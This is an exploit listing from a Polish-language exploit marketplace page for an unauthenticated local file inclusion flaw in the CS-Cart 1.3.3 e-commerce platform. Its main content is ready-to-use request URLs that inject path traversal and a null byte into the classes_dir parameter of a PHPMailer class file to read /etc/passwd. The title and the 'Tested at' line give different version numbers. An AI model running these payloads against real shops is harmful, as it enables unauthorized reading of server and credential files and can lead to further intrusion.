[ autoryzacja ] [ rejestracja ] [ odzyskaj konto ]
Skontaktuj się
Możesz się z nami skonaktować przez:
0day Today  Market Exploitów i Baza Exploitów 0day

CS-Cart 1.3.3 - (classes_dir) LFI Vulnerability

Autor
0xmmnbassel
Ryzyko
[
Wysokie Zagrożenie Bezpieczeństwa
]
0day-ID
0day-ID-35048
Kategoria
web applications
Data dodania
16-10-2020
Platforma
php
# Exploit Title: CS-Cart unauthenticated LFI
# Exploit Author:  0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.4
# Vulnerability Type: unauthenticated LFI


http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example: 
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

#  0day.today [2024-06-30]  #